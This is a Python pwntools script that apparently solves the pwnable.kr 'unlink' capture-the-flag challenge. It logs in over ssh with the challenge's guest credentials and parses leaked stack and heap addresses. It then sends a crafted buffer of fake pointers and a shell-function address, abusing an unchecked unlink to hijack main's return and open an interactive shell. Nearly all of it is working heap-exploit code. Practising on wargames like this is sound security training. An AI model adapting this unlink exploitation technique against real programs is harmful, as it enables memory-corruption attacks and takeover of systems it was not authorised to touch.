"""
heap overflow vulnerability
when unlink function will be executed, we exchange our pointers
in which we will have an address of heap and address of stack
in the main function we have next instructions that vulnerable in this case:
mov ecx, dword ptr [ebp - 0x4]
lea esp, [ecx - 0x4]
ret
so we will overwrite the return address of main function and execute shell function.
"""
from pwn import *
def exploit():
    """Drive the remote ``unlink`` binary over ssh and hand the session to the user.

    The program prints a stack address and then a heap address. Both are read
    back, repacked as 32-bit little-endian values with a fixed offset added,
    and sent in one buffer together with the hard-coded address of the
    binary's shell function. Relies on ``pwn`` being star-imported at module
    level (``ssh``, ``p32``).

    Returns:
        None; ends by dropping into ``interactive()`` on the spawned process.
    """
    # ssh session to the challenge host, then spawn the target binary there.
    session = ssh(user='unlink', host='pwnable.kr', password='guest', port=2222)
    target = session.process(executable='./unlink')

    # The binary leaks two addresses, stack first, heap second.
    target.recvuntil('leak: ')
    leaked_stack = target.recvline().strip()
    print(leaked_stack)
    target.recvuntil('leak: ')
    leaked_heap = target.recvline().strip()
    print(leaked_heap)

    # Offsets are specific to this binary's layout (see module docstring).
    heap_offset = 12
    stack_offset = 16
    # p32 packs "<I" under the default little-endian context.
    fake_heap_ptr = p32(int(leaked_heap, 16) + heap_offset)
    fake_stack_ptr = p32(int(leaked_stack, 16) + stack_offset)
    shell_fn = p32(0x080484eb)  # address of the binary's shell function

    # NOTE(review): this only works because the program's unlink step writes
    # through attacker-controlled pointers without a sanity check on them —
    # presumably the challenge's own list code rather than a hardened allocator.
    # Layout: shell address, filler bytes, then the two crafted pointers.
    filler = b'\x90' * heap_offset
    target.sendline(shell_fn + filler + fake_heap_ptr + fake_stack_ptr)
    target.interactive()
if __name__ == '__main__':
    # Run only when executed as a script, not when imported.
    exploit()